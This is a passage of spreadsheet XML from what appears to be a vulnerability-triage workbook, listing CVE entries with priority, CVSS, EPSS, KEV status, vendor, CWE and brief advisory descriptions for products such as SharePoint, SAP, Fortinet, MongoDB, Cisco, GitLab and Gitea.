      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K493" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76960</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76961</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA Finance (Advanced Payment Management) does not perform sufficient Cross-Site Request Forgery protection on certain requests, due to this an attacker with low privileges could craft a malicious link or page. If an authenticated victim interacts with it, unintended actions could be triggered on the web server on their behalf. This results in a low impact on confidentiality and integrity. There is no impact on availability.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84389</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84392</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>A NULL Pointer Dereference vulnerability [CWE-476] vulnerability in Fortinet FortiOS 7.4 all versions, FortiOS 7.2 all versions, FortiPAM 1.9.0, FortiPAM 1.8 all versions, FortiPAM 1.7 all versions, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.6, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions may allow an authenticated attacker to crash the httpsd daemon via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82060</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K498" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>In MongoDB, insufficient validation of shard key values during document insertion allowed authenticated users to store documents with specially crafted, operator-shaped objects as shard key values in sharded collections. When change stream events for such documents were processed with the updateLookup full document mode, the crafted values were embedded into internal post-image lookup queries without proper sanitization, causing them to be interpreted as query operators rather than literal equality values. This could result in change stream consumers receiving incorrect post-image documents or encountering non-resumable fatal errors.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58234</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>SAP Process Integration (SOAP Adapter) allows a privileged user to send specially crafted requests containing deeply nested entity definitions, which under certain conditions could temporarily increase processor load and degrade system responsiveness. Successful exploitation results in low impact on availability with no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86517</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. The impacted element is the function mysqli_query of the file /pages/us_searchfrm.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62815</t>
        </is>
      </c>
      <c r="D501" s="5" t="inlineStr"/>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t>
        </is>
      </c>
      <c r="M501" s="5" t="inlineStr">
        <is>
          <t>2.4.19, 2.5.10</t>
        </is>
      </c>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr"/>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t># Summary
Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.
# Details
New network path creations and removals triggered by incoming packets can lead to a pointer invalidation.
## Patches
- Guard path promotion [e0f55b5](https://github.com/microsoft/msquic/commit/e0f55b5fdc9fff0b4465976d066ebd22fb7e2b3b)
# Impact
An unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to an affected service over the network. Successful exploitation could allow the attacker to execute code on the target system. No authentication or user interaction is required.</t>
        </is>
      </c>
      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D502" s="5" t="inlineStr"/>
      <c r="E502" s="5" t="inlineStr"/>
      <c r="F502" s="5" t="inlineStr"/>
      <c r="G502" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H502" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I502" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J502" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K502" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr"/>
      <c r="P502" s="5" t="inlineStr"/>
      <c r="Q502" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R502" s="5" t="inlineStr"/>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D503" s="5" t="inlineStr"/>
      <c r="E503" s="5" t="inlineStr"/>
      <c r="F503" s="5" t="inlineStr"/>
      <c r="G503" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H503" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I503" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J503" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K503" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr"/>
      <c r="P503" s="5" t="inlineStr"/>
      <c r="Q503" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S503"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T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D504" s="5" t="inlineStr"/>
      <c r="E504" s="5" t="inlineStr"/>
      <c r="F504" s="5" t="inlineStr"/>
      <c r="G504" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H504" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I504" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J504" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K504" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr"/>
      <c r="P504" s="5" t="inlineStr"/>
      <c r="Q504" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R504" s="5" t="inlineStr"/>
      <c r="S504"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T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D505" s="5" t="inlineStr"/>
      <c r="E505" s="5" t="inlineStr"/>
      <c r="F505" s="5" t="inlineStr"/>
      <c r="G505" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J505" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K505" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr"/>
      <c r="P505" s="5" t="inlineStr"/>
      <c r="Q505" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R505" s="5" t="inlineStr"/>
      <c r="S50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T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D506" s="5" t="inlineStr"/>
      <c r="E506" s="5" t="inlineStr"/>
      <c r="F506" s="5" t="inlineStr"/>
      <c r="G506" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H506" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I506" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J506" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K506" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr"/>
      <c r="P506" s="5" t="inlineStr"/>
      <c r="Q506" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="R506" s="5" t="inlineStr"/>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D507" s="5" t="inlineStr"/>
      <c r="E507" s="5" t="inlineStr"/>
      <c r="F507" s="5" t="inlineStr"/>
      <c r="G507" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H507" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I507" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J507" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K507" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr"/>
      <c r="P507" s="5" t="inlineStr"/>
      <c r="Q507" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R507" s="5" t="inlineStr"/>
      <c r="S507"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T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T507"/>
  <conditionalFormatting sqref="E2:E50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0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s>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet9.xml><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetPr><outlinePr summaryBelow="1" summaryRight="1" /><pageSetUpPr /></sheetPr><dimension ref="A1:T110" /><sheetViews><sheetView workbookViewId="0"><pane xSplit="3" ySplit="1" topLeftCell="D2" activePane="bottomRight" state="frozen" /><selection pane="topRight" /><selection pane="bottomLeft" /><selection pane="bottomRight" activeCell="A1" sqref="A1" /></sheetView></sheetViews><sheetFormatPr baseColWidth="8" defaultRowHeight="15" /><cols><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sheetData><row r="1"><c r="A1" s="4" t="inlineStr"><is><t>Priority</t></is></c><c r="B1" s="4" t="inlineStr"><is><t>Reason</t></is></c><c r="C1" s="4" t="inlineStr"><is><t>ID</t></is></c><c r="D1" s="4" t="inlineStr"><is><t>CVSS</t></is></c><c r="E1" s="4" t="inlineStr"><is><t>Severity</t></is></c><c r="F1" s="4" t="inlineStr"><is><t>Score src</t></is></c><c r="G1" s="4" t="inlineStr"><is><t>KEV</t></is></c><c r="H1" s="4" t="inlineStr"><is><t>EPSS</t></is></c><c r="I1" s="4" t="inlineStr"><is><t>SSVC</t></is></c><c r="J1" s="4" t="inlineStr"><is><t>Watchlist</t></is></c><c r="K1" s="4" t="inlineStr"><is><t>Vendor / Product</t></is></c><c r="L1" s="4" t="inlineStr"><is><t>Package</t></is></c><c r="M1" s="4" t="inlineStr"><is><t>Fixed in</t></is></c><c r="N1" s="4" t="inlineStr"><is><t>Sources</t></is></c><c r="O1" s="4" t="inlineStr"><is><t>Published</t></is></c><c r="P1" s="4" t="inlineStr"><is><t>Last Modified</t></is></c><c r="Q1" s="4" t="inlineStr"><is><t>KEV Due</t></is></c><c r="R1" s="4" t="inlineStr"><is><t>CWE</t></is></c><c r="S1" s="4" t="inlineStr"><is><t>Description</t></is></c><c r="T1" s="4" t="inlineStr"><is><t>Link</t></is></c></row><row r="2"><c r="A2" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B2" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2" s="5" t="inlineStr"><is><t>CVE-2026-60004</t></is></c><c r="D2" s="5" t="inlineStr" /><c r="E2" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2" s="5" t="inlineStr" /><c r="H2" s="5" t="n"><v>0.868</v></c><c r="I2" s="5" t="inlineStr" /><c r="J2" s="5" t="inlineStr" /><c r="K2" s="5" t="inlineStr" /><c r="L2" s="5" t="inlineStr"><is><t>Go:gitea.dev</t></is></c><c r="M2" s="5" t="inlineStr"><is><t>1.27.1</t></is></c><c r="N2" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q2" s="5" t="inlineStr" /><c r="R2" s="5" t="inlineStr" /><c r="S2" s="5" t="inlineStr"><is><t>### Summary

Gitea's `diffpatch` endpoint can be abused to install and execute a Git hook from repository-controlled content.

